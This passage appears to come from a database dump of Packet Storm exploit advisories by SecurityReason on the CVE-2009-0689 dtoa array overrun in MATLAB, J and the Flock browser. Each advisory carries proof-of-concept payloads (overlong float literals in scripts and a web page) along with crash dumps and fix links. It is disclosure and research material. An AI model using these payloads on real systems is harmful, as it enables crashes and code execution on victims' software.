\npeople across industry and the academic world \n \n \n--- 1. Matlab 2009b Array Overrun (code execution) --- \nThe main problem exist in dtoa implementation. Matlab has the same dtoa \nas Mozilla, OpenBSD, MacOS, Google, Opera etc. \nand it is the same like SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it \nis possible to call 16<= elements of freelist array. \n \n \n--- 2. Proof of Concept (PoC) --- \nThere are several ways to make a successful attack. Simplest assumed the \ncreation of a script with a defective floating-point variable and \nexecution it. This will allow the possibility of code execution. \n \n-expl.m---------------------- \ncxib=0.<?php echo str_repeat(\"1\",296450); ?> \n-expl.m---------------------- \n \nMATLAB crash file:C:\\DOCUME~1\\WinXPae\\USTAWI~1\\Temp\\matlab_crash_dump.552 \n------------------------------------------------------------------------ \nSegmentation violation detected at Wed Dec 03 12:04:02 2009 \n------------------------------------------------------------------------ \n \nConfiguration: \nMATLAB Version: 7.9.0.529 (R2009b) \nMATLAB License: [PRIV] \nOperating System: Microsoft Windows XP \nWindow System: Version 5.1 (Build 2600: Dodatek Service Pack 3) \nProcessor ID: x86 Family 6 Model 7 Stepping 6, GenuineIntel \nVirtual Machine: Java 1.6.0_12-b04 with Sun Microsystems Inc. Java \nHotSpot(TM) Client VM mixed mode \nDefault Encoding: windows-1250 \n \nFault Count: 1 \n \nRegister State: \nEAX = 71c71c71 EBX = 188ade48 \nECX = 0000000a EDX = 188adde0 \nESI = 00000002 EDI = 00000003 \nEBP = 00c3dec0 ESP = 00c3de90 \nEIP = 7baf965e FLG = 00010206 \n \nStack Trace: \n[0] libut.dll:_Balloc(0x188adde0, 0x188ade48, 10, 1) + 14 bytes \n[1] libut.dll:_s2b(0x188adde0, 333333, 333333, 0x069f6bc7) + 112 bytes \n[2] libut.dll:_ut_strtod(0x188adde0, 0x19a80048 \n\"0.111111111111111111111111111111..\", 0x00c3e024, 0x00c3e028) + 1123 bytes \n[3] m_ir.dll:_mps_parse_matlab_real(0x188ad9f0, 0x00c3e068, 11, 0) + \n576 bytes \n[4] m_parser.dll:_mps_convert_M_NUMBER(0x188afb90, 0x1971d070, \n0x1971d048, 0x188afb90) + 71 bytes \n[5] m_parser.dll:_mps_convert_lval(0x188afb90, 0x1971d048, 0x1971d070, \n0) + 224 bytes \n[6] m_parser.dll:_mps_convert_M_Primary_4(0x188afb90, 0x1971d084, \n0x1971d0e8, 0x188afb90) + 191 bytes \n[7] m_parser.dll:_mps_convert_M_Stmt_2(0x188afb90, 0x1971d0d4, \n0x1971d0e8, 0x188afb90) + 247 bytes \n[8] m_parser.dll:_mps_convert_M_Stmts_2(0x188afb90, 0x1971d0e8, \n0x188afb90, 0x199d95b0) + 703 bytes \n[9] m_parser.dll:_mps_make_M_body_from_parse_tree(0x1971d0e8, 0, \n333337, 0) + 1283 bytes \n[10] m_parser.dll:_mps_convert_script(0x00c3e788, 18, 0x00c3e550 \n\"\u0111\u013a\u0102\", 0x7a36323f) + 1073 bytes \n[11] m_parser.dll:_mps_convert_M_File_1(0x188afb90, 0x189b3960, \n0x188afb90, 0x189b3960) + 66 bytes \n[12] m_parser.dll:_mps_M_to_IR_eval(0x00c3e7b4, 0x00c3e774, \n0x00c3e778, 0x00c3e77c) + 1471 bytes \n[13] m_parser.dll:_mps_M_to_IR(0x00c3e80f, 0x00c3e7b4, 0x00c3e774, \n0x00c3e778) + 307 bytes \n[14] m_interpreter.dll:public: void __thiscall \nMfh_mp::inCompileMfile(char const *)(0x03ba1a86 \"C:\\Documents And \nSettings\\WinXPa..\", 1, 0x1977c300 \"\u00a4\u00c4.z\", 0x00850000) + 492 bytes \n[15] m_interpreter.dll:public: void __thiscall \nMfh_mp::inCompileMOrLoadPFile(void)(0, 0x7a1459e2, 1, 0x1977c300 \"\u00a4\u00c4.z\") \n+ 266 bytes \n[16] m_interpreter.dll:public: virtual void __thiscall \nMlm_mp::load_file(void)(0, 0x1977c300 \"\u00a4\u00c4.z\", 0, 0x78134c58) + 32 bytes \n[17] m_dispatcher.dll:public: void __thiscall \nMlm_MATLAB_fn::try_load(void)(0x19728978, 0x78159334, 1, 0x00c3ee54 \n\"\u0158\u010f\u0102\") + 71 bytes \n[18] m_dispatcher.dll:public: void __thiscall \nMlm_MATLAB_fn::load(void)(0, 0x19728978, 0, 0xffffffff) + 76 bytes \n[19] m_dispatcher.dll:public: virtual void __thiscall \nMfh_file::dispatch_fh(int,struct mxArray_tag * *,int,struct mxArray_tag \n* *)(0, 0x00c3ef04, 0, 0x00c3ef64) + 364 bytes \n[20] m_interpreter.dll:int __cdecl inDispatchFromStack(int,char const \n*,int,int)(828, 0, 0, 0) + 623 bytes \n[21] m_interpreter.dll:_inCallFcnFromReference(0x19860138, 0x198d00e0, \n0, 0x02850000) + 80 bytes \n[22] m_interpreter.dll:int __cdecl inInterp(enum \ninDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag volatile *,int \n*)(1, 0, 1, 0) + 6204 bytes \n[23] m_interpreter.dll:int __cdecl protected_inInterp(enum \ninDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag *,int *)(1, 0, \n1, 0) + 39 bytes \n[24] m_interpreter.dll:int __cdecl inInterPcodeSJ(enum \ninDebugCheck,int,int,enum opcodes,struct inPcodeNest_tag *,int *)(1, 0, \n1, 0) + 251 bytes \n[25] m_interpreter.dll:int __cdecl inExecuteMFunctionOrScript(class \nMfh_mp *,bool)(0x02850001, 0xffffffff, 0x19a187b0, 0) + 924 bytes \n[26] m_interpreter.dll:void __cdecl inRunMfile(int,struct mxArray_tag \n* *,int,struct mxArray_tag * *,class Mfh_mp *,struct inWorkSpace_tag \n*)(0, 0x00c3f988, 0, 0) + 466 bytes \n[27] m_interpreter.dll:public: virtual void __thiscall \nMfh_mp::dispatch_file(struct _mdUnknown_workspace *,int,struct \nmxArray_tag * *,int,struct mxArray_tag * *)(0, 0, 0x00c3f988, 0) + 23 bytes \n[28] m_interpreter.dll:public: virtual void __thiscall \nMfh_mp::dispatch_file(int,struct mxArray_tag * *,int,struct mxArray_tag \n* *)(0, 0x00c3f988, 0, 0) + 25 bytes \n[29] m_dispatcher.dll:public: virtual void __thiscall \nMfh_file::dispatch_fh(int,struct mxArray_tag * *,int,struct mxArray_tag \n* *)(0, 0x00c3f988, 0, 0) + 204 bytes \n[30] m_interpreter.dll:void __cdecl inEvalPcodeHeaderToWord(struct \n_memory_context *,int,struct mxArray_tag * * const,struct _pcodeheader \n*,class Mfh_mp *,unsigned long)(0x7bb796d4, 0, 0x00c3f988, 0x00c3f898) + \n73 bytes \n[31] m_interpreter.dll:enum inExecutionStatus __cdecl \nin_local_call_script_function(struct _memory_context *,struct \n_pcodeheader *,int,struct mxArray_tag * * const,unsigned \nlong,bool)(0x7bb796d4, 0x00c3f898, 0, 0x00c3f988) + 70 bytes \n[32] \nm_interpreter.dll:__catch$??1inProtectHotSegment@@QAE@XZ$0(0x7bb796d4, \n0x03ae5b90 \"ma\\n\", 0, 0) + 888 bytes \n[33] m_interpreter.dll:enum inExecutionStatus __cdecl \ninEvalCmdWithLocalReturn(char const *,int *,bool,bool,bool \n(__cdecl*)(void *,char const *))(0x03ae5b90 \"ma\\n\", 0, 0, 1) + 80 bytes \n[34] m_interpreter.dll:public: virtual enum inExecutionStatus \n__thiscall InterpBridge::EvalCmdWithLocalReturn(char const *,int \n*,bool,bool)(0x03ae5b90 \"ma\\n\", 0, 0, 1) + 25 bytes \n[35] m_interpreter.dll:_inEvalCmdWithLocalReturn(0x03ae5b90 \"ma\\n\", 0, \n0, 1) + 30 bytes \n[36] bridge.dll:enum inExecutionStatus __cdecl \nevalCommandWithLongjmpSafety(char const *)(0x03ae5b90 \"ma\\n\", 0, \n0x18894ac8, 0) + 67 bytes \n[37] bridge.dll:__catch$_mnParser$0(0x03d0b378, 0, 0x068ce201, 1) + \n300 bytes \n[38] mcr.dll:private: void __thiscall \nmcrInstance::mnParser_on_interpreter_thread(void)(0x18894b00, \n0x066fe5dc, 10, 0x00c3fccc) + 51 bytes \n[39] mcr.dll:public: void __thiscall \nboost::function0<void>::operator()(void)const (0, 0x18894ac8, 0, \n0x18894ac8) + 63 bytes \n[40] mcr.dll:public: virtual void __thiscall \nmcr::runtime::InterpreterThread::Impl::NoResultInvocationRequest::run(void)(0x7a27a800, \n0x066fe000 \"...y\", 0x00c3fb54, 0) + 53 bytes \n[41] mcr.dll:private: static void __cdecl \nmcr::runtime::InterpreterThread::Impl::invocation_request_handler(int)(0x18894ac8, \n0, 0x00030000 \"Actx \", 0x00c3fcb4) + 40 bytes \n[42] uiw.dll:bool __cdecl UIW_DispatchUserMessage(int,int)(9225, \n0x18894ac8, 0x00c3fcb4, 2) + 81 bytes \n[43] uiw.dll:long __stdcall HandleUserMsgHook(int,unsigned \nint,long)(0, 1, 0x00c3fcb4, 0x79c73540) + 95 bytes \n[44] USER32.dll:0x7e381923(0x00030000 \"Actx \", 1, 0x00c3fcb4, 0x7b38edd0) \n[45] USER32.dll:0x7e37b317(0x00c3fca4, 0x00c3fcb4, 0x00c3fcd0, 0) \n[46] USER32.dll:0x7e3778d0(0x00c3fca4, 48, 0x00030000 \"Actx \", 1) \n[47] ntdll.dll:0x7c90e473(0x00c3fd20, 0, 0, 0) \n[48] uiw.dll:void __cdecl UIW_GetAndDispatchMessage(struct tagMSG \n*)(0x00c3fd20, 2, 2, 0x18894ac8) + 20 bytes \n[49] uiw.dll:void __cdecl UIW_GetAndDispatchMessage(void)(0x03cddcf0, \n0, 0x03d40d00, 0) + 15 bytes \n[50] uiw.dll:void __cdecl ws_ProcessPendingEventsMainLoop(int,bool)(1, \n0, 0x00c3fdbc \"\u00fc\u00fd\u0102\", 0x7a27d26a) + 356 bytes \n[51] uiw.dll:void __cdecl ws_ProcessPendingEvents(int,int)(1, \n0xffffffff, 0x03cddcf0, 0x03d40d00) + 14 bytes \n[52] mcr.dll:public: void __thiscall \nmcr::runtime::InterpreterThread::Impl::process_events(class \nboost::shared_ptr<class mcr::runtime::InterpreterThread::Impl> const \n&)(0x00c3fe14, 2, 0x03d40768, 0x046add8c) + 138 bytes \n[53] \nmcr.dll:__catch$?run@Impl@InterpreterThread@runtime@mcr@@QAEKABV?$shared_ptr@VImpl@InterpreterThread@runtime@mcr@@@boost@@PAUinit_context@1234@@Z$0(0x00c3fe14, \n0x03d44280, 0x7a27d630, 0x03d3d710) + 128 bytes \n[54] mcr.dll:unsigned long __cdecl run_init_and_handle_events(void \n*)(0x046add8c, 0, 0x03d40708, 0) + 76 bytes \n[55] mcr.dll:private: void __thiscall \nmcr::runtime::InterpreterThreadFactory::runThreadFunction(void)(0x00c3fec8, \n0x00c3fe80, 0x00c3fe84 \"\u0111\u0163\u0102\", 0x7bafb34c) + 108 bytes \n[56] matlab.exe:public: void __thiscall \nboost::function0<void>::operator()(void)const (336710, 0x0040b7f4, 0, \n0x78131731) + 63 bytes \n[57] matlab.exe:int __cdecl mcrMain(int,char const * * const)(1, \n0x03d43378, 4194304, 1) + 230 bytes \n[58] matlab.exe:_WinMain@16(4194304, 0, 336710, 1) + 75 bytes \n[59] matlab.exe:___tmainCRTStartup(1068244, 514808, 0x7ffde000, \n0x80544c7d) + 320 bytes \n[60] kernel32.dll:0x7c817077(0x00406faa, 0, 0x00905a4d, 3) \n \neax=0x71c71c71 \n \nedi=0x0 esi=0x2 \n \n--- 3. SecurityReason Note --- \nOfficialy SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n- MatLab \n- J \n \nThis list is not yet closed. \n \n \n--- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.com/exploit_alert/ - Exploit Database \nhttp://securityreason.com/security_alert/ - Vulnerability Database \n \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84946/matlab-overrun.txt"}, {"lastseen": "2016-12-05T22:22:14", "description": "", "published": "2010-01-09T00:00:00", "type": "packetstorm", "title": "J 6.02.023 Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-01-09T00:00:00", "id": "PACKETSTORM:84943", "href": "https://packetstormsecurity.com/files/84943/J-6.02.023-Array-Overrun.html", "sourceData": "`[ J 6.02.023 Array Overrun (code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- Dis.: 07.05.2009 \n- Pub.: 08.01.2010 \n \nCVE: CVE-2009-0689 \nCWE: CWE-119 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- J 6.02.023 Array Overrun (code execution) \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/79 \n \n \n--- 0.Description --- \nThe J programming language, developed in the early 1990s by Ken Iverson \nand Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL \nfunction-level languages created by John Backus. \n \nTo avoid repeating the APL special character problem, J requires only \nthe basic ASCII character set, resorting to the use of digraphs formed \nusing the dot or colon characters to extend the meaning of the basic \ncharacters available. Additionally, to keep parsing and the language \nsimple, and to compensate for the lack of character variation in ASCII, \nJ treats many characters which might need to be balanced in other \nlanguages (such as [] {} \"\" `` or <>) as stand alone tokens or (with \ndigraphs) treats them as part of a multi-character token. \n \nBeing an array programming language, J is very terse and powerful, and \nis most suited to mathematical and statistical programming, especially \nwhen performing operations on matrices. J is a MIMD language. \n \n--- 1. J 6.02.023 Array Overrun (code execution) --- \nThe main problem exist in dtoa implementation. J has the same dtoa as \nMatLab, OpenBSD, MacOS, Google, Opera etc. \nand it is the same like SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it \nis possible to call 16<= elements of freelist array. \n \n \n--- 2. Proof of Concept (PoC) --- \nThere are several ways to make a successful attack. Simplest assumed the \ncreation of a script with a defective floating-point variable and \nexecution it. This will allow the possibility of code execution. \n \n-expl.ijs---------------------- \ncxib=0.<?php echo str_repeat(\"1\",296450); ?> \n-expl.ijs---------------------- \n \nProgram received signal SIGSEGV, Segmentation fault. \n0x00452157 in ?? () \n \neax 0x4c2000 4988928 \necx 0x2c667c 2909820 \nedx 0x46d054 4640852 \nebx 0x48a607 296455 \nesp 0x98f720 0x98f720 \nebp 0x98f77c 0x98f77c \nesi 0x4363808 70662152 \nedi 0x0 0 \neip 0x452157 0x452157 \neflags 0x10206 [ PF IF RF ] \ncs 0x1b 27 \nss 0x23 35 \nds 0x23 35 \nes 0x23 35 \nfs 0x3b 59 \ngs 0x0 0 \n \nedi=0 \n \n(gdb) x/i $eip \n0x452157: test %eax,(%eax) \n(gdb) x/x $eax \n0x4c2000: 0x00000000 \n \n \n--- 3. SecurityReason Note --- \nOfficialy SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n- MatLab \n- J \n \nThis list is not yet closed. \n \n \n--- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.com/exploit_alert/ - Exploit Database \nhttp://securityreason.com/security_alert/ - Vulnerability Database \n \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84943/j-overrun.txt"}, {"lastseen": "2016-12-05T22:12:07", "description": "", "published": "2009-12-12T00:00:00", "type": "packetstorm", "title": "Flock 2.5.2 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-12T00:00:00", "id": "PACKETSTORM:83737", "href": "https://packetstormsecurity.com/files/83737/Flock-2.5.2-Remote-Array-Overrun.html", "sourceData": "`[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- Dis.: 07.05.2009 \n- Pub.: 11.12.2009 \n \nCVE: CVE-2009-0689 \nCWE: CWE-119 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- Flock 2.5.2 \n \nFixed in: \n- Flock 2.5.5 \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/75 \n \n \n--- 0.Description --- \nFlock is a web browser built on Mozilla.s Firefox codebase that \nspecializes in providing social networking and Web 2.0 facilities built \ninto its user interface. Flock v2.5 was officially released on May 19, 2009. \n \nThe Flock browser is available as a free download, and supports \nMicrosoft Windows, Mac OS X, and Linux platforms. \n \n \n--- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) --- \nThe main problem exist in dtoa implementation. Flock has the same dtoa \nas Firefox, SeaMonkey, Chrome, Opera etc. \nand it is the same like SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and \nit is possible to call 16<= elements of freelist array. \n \n \n--- 2. Proof of Concept (PoC) --- \n----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",296450); ?>; \n</script> \n----------------------- \n \nProgram received signal SIGSEGV, Segmentation fault. \n0x67c68740 in js3250!JS_DHashTableEnumerate () \nfrom C:\\Program Files\\Flock\\js3250.dll \n(gdb) i r \neax 0x964619c7 -1773790777 \necx 0x2 2 \nedx 0x2 2 \nebx 0x2 2 \nesp 0x20e7f0 0x20e7f0 \nebp 0x1 0x1 \nesi 0x299d700 43636480 \nedi 0x299d701 43636481 \neip 0x67c68740 0x67c68740 \n<js3250!JS_DHashTableEnumerate+288> \neflags 0x210202 [ IF RF ID ] \ncs 0x1b 27 \nss 0x23 35 \nds 0x23 35 \nEs 0x23 35 \nfs 0x3b 59 \ngs 0x0 0 \n \n(gdb) x/i 0x67c68740 \n0x67c68740 <js3250!JS_DHashTableEnumerate+288>: \nmov 0x67ce0458(,%edi,4),%eax \n(gdb) x/x $eax \n0x964619c7: Cannot access memory at address 0x964619c7 \n \n \n--- 3. SecurityReason Note --- \nOfficialy SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n \nThis list is not yet closed. \n \n \n--- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c 